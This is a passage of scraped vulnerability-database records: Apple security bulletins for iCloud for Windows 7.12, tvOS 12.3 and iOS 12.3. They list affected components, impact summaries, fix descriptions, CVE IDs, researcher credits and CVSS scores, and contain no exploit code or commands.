&amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-11T09:00:29", "title": "About the security content of iCloud for Windows 7.12 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8608", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8577", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8602", "CVE-2019-8594", "CVE-2019-8622", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8582", "CVE-2019-8619", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8623", "CVE-2019-8609", "CVE-2019-8595"], "modified": "2019-09-11T09:00:29", "id": "APPLE:HT210125", "href": "https://support.apple.com/kb/HT210125", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:43:25", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## tvOS 12.3\n\nReleased May 13, 2019\n\n**AppleFileConduit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8593: Dany Lisiansky (@DanyL931)\n\n**Bluetooth**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Due to a misconfiguration in the Bluetooth pairing protocols of a Bluetooth Low Energy (BLE) version of FIDO Security Keys it may be possible for an attacker with physical proximity to be able to intercept Bluetooth traffic during pairing\n\nDescription: This issue was addressed by disabling accessories with insecure Bluetooth connections. Customers using the Bluetooth Low Energy (BLE) version of the Titan Security Key by Google should review Android\u2019s June Bulletins and Google\u2019s advisory and take appropriate action.\n\nCVE-2019-2102: Matt Beaver and Erik Peterson of Microsoft Corp.\n\nEntry added September 17, 2019\n\n**CoreAudio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added August 1, 2019\n\n**CoreAudio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\n**CoreText**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added July 25, 2019\n\n**Disk Images**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological University\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8633: Zhuo Liang of Qihoo 360 Vulcan Team\n\nEntry added September 17, 2019\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8576: Brandon Azad of Google Project Zero, Junho Jang and Hanul Choi of LINE Security Team\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-8591: Ned Williamson working with Google Project Zero\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Users removed from an iMessage conversation may still be able to alter state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8631: Jamie Bishop of Dynastic\n\nEntry added August 1, 2019\n\n**MobileInstallation**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**MobileLockdown**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8637: Dany Lisiansky (@DanyL931)\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**sysdiagnose**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)\n\nEntry updated February 3, 2020\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\n**Wi-Fi**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An attacker in a privileged network position can modify driver state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8612: Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\nEntry added May 30, 2019\n\n**Wi-Fi**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A device may be passively tracked by its Wi-Fi MAC address\n\nDescription: A user privacy issue was addressed by removing the broadcast MAC address.\n\nCVE-2019-8620: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\n\n\n## Additional recognition\n\n**CoreAudio**\n\nWe would like to acknowledge riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative for their assistance.\n\nEntry added July 25, 2019\n\n**CoreFoundation**\n\nWe would like to acknowledge Vozzie and Rami and m4bln, Xiangqian Zhang, Huiming Liu of Tencent's Xuanwu Lab for their assistance.\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero and an anonymous researcher for their assistance.\n\n**MediaLibrary**\n\nWe would like to acknowledge Angel Ramirez and Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. for their assistance.\n\n**MobileInstallation**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) for their assistance.\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-27T08:21:15", "title": "About the security content of tvOS 12.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8568", "CVE-2019-8608", "CVE-2019-8633", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8593", "CVE-2019-8577", "CVE-2019-8612", "CVE-2019-8592", "CVE-2019-8591", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8602", "CVE-2019-8637", "CVE-2019-8560", "CVE-2019-8594", "CVE-2019-8585", "CVE-2019-8622", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8620", "CVE-2019-8607", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8582", "CVE-2019-8619", "CVE-2019-8631", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-2102", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8574", "CVE-2019-8623", "CVE-2019-8576", "CVE-2019-8609", "CVE-2019-8595"], "modified": "2020-07-27T08:21:15", "id": "APPLE:HT210120", "href": "https://support.apple.com/kb/HT210120", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T04:14:05", "description": "# About the security content of tvOS 12.3\n\nThis document describes the security content of tvOS 12.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## tvOS 12.3\n\nReleased May 13, 2019\n\n**AppleFileConduit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8593: Dany Lisiansky (@DanyL931)\n\n**Bluetooth**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Due to a misconfiguration in the Bluetooth pairing protocols of a Bluetooth Low Energy (BLE) version of FIDO Security Keys it may be possible for an attacker with physical proximity to be able to intercept Bluetooth traffic during pairing\n\nDescription: This issue was addressed by disabling accessories with insecure Bluetooth connections. Customers using the Bluetooth Low Energy (BLE) version of the Titan Security Key by Google should review Android\u2019s June Bulletins and Google\u2019s advisory and take appropriate action.\n\nCVE-2019-2102: Matt Beaver and Erik Peterson of Microsoft Corp.\n\nEntry added September 17, 2019\n\n**CoreAudio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added August 1, 2019\n\n**CoreAudio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\n**CoreText**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added July 25, 2019\n\n**Disk Images**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological University\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8633: Zhuo Liang of Qihoo 360 Vulcan Team\n\nEntry added September 17, 2019\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8576: Brandon Azad of Google Project Zero, Junho Jang and Hanul Choi of LINE Security Team\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-8591: Ned Williamson working with Google Project Zero\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Users removed from an iMessage conversation may still be able to alter state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8631: Jamie Bishop of Dynastic\n\nEntry added August 1, 2019\n\n**MobileInstallation**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**MobileLockdown**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8637: Dany Lisiansky (@DanyL931)\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**sysdiagnose**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)\n\nEntry updated February 3, 2020\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\n**Wi-Fi**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An attacker in a privileged network position can modify driver state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8612: Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\nEntry added May 30, 2019\n\n**Wi-Fi**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A device may be passively tracked by its Wi-Fi MAC address\n\nDescription: A user privacy issue was addressed by removing the broadcast MAC address.\n\nCVE-2019-8620: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\n\n\n## Additional recognition\n\n**CoreAudio**\n\nWe would like to acknowledge riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative for their assistance.\n\nEntry added July 25, 2019\n\n**CoreFoundation**\n\nWe would like to acknowledge Vozzie and Rami and m4bln, Xiangqian Zhang, Huiming Liu of Tencent's Xuanwu Lab for their assistance.\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero and an anonymous researcher for their assistance.\n\n**MediaLibrary**\n\nWe would like to acknowledge Angel Ramirez and Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. for their assistance.\n\n**MobileInstallation**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: July 27, 2020\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-13T00:00:00", "type": "apple", "title": "About the security content of tvOS 12.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2102", "CVE-2019-6237", "CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8571", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8582", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8591", "CVE-2019-8592", "CVE-2019-8593", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8612", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8620", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628", "CVE-2019-8631", "CVE-2019-8633", "CVE-2019-8637"], "modified": "2019-05-13T00:00:00", "id": "APPLE:8C5416054DEFC022B2CEE91325E63CED", "href": "https://support.apple.com/kb/HT210120", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:51", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 12.3\n\nReleased May 13, 2019\n\n**AppleFileConduit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8593: Dany Lisiansky (@DanyL931)\n\n**Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Due to a misconfiguration in the Bluetooth pairing protocols of a Bluetooth Low Energy (BLE) version of FIDO Security Keys it may be possible for an attacker with physical proximity to be able to intercept Bluetooth traffic during pairing\n\nDescription: This issue was addressed by disabling accessories with insecure Bluetooth connections. Customers using the Bluetooth Low Energy (BLE) version of the Titan Security Key by Google should review Android\u2019s June Bulletins and Google\u2019s advisory and take appropriate action.\n\nCVE-2019-2102: Matt Beaver and Erik Peterson of Microsoft Corp.\n\nEntry added September 17, 2019\n\n**Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**CoreAudio**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\n**CoreAudio**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added August 1, 2019\n\n**CoreText**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added July 25, 2019\n\n**Disk Images**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological University\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8633: Zhuo Liang of Qihoo 360 Vulcan Team\n\nEntry added September 17, 2019\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8576: Brandon Azad of Google Project Zero, Junho Jang and Hanul Choi of LINE Security Team\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-8591: Ned Williamson working with Google Project Zero\n\n**Lock Screen**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to see the email address used for iTunes\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2019-8599: Jeremy Pe\u00f1a-Lopez (aka Radio) of the University of North 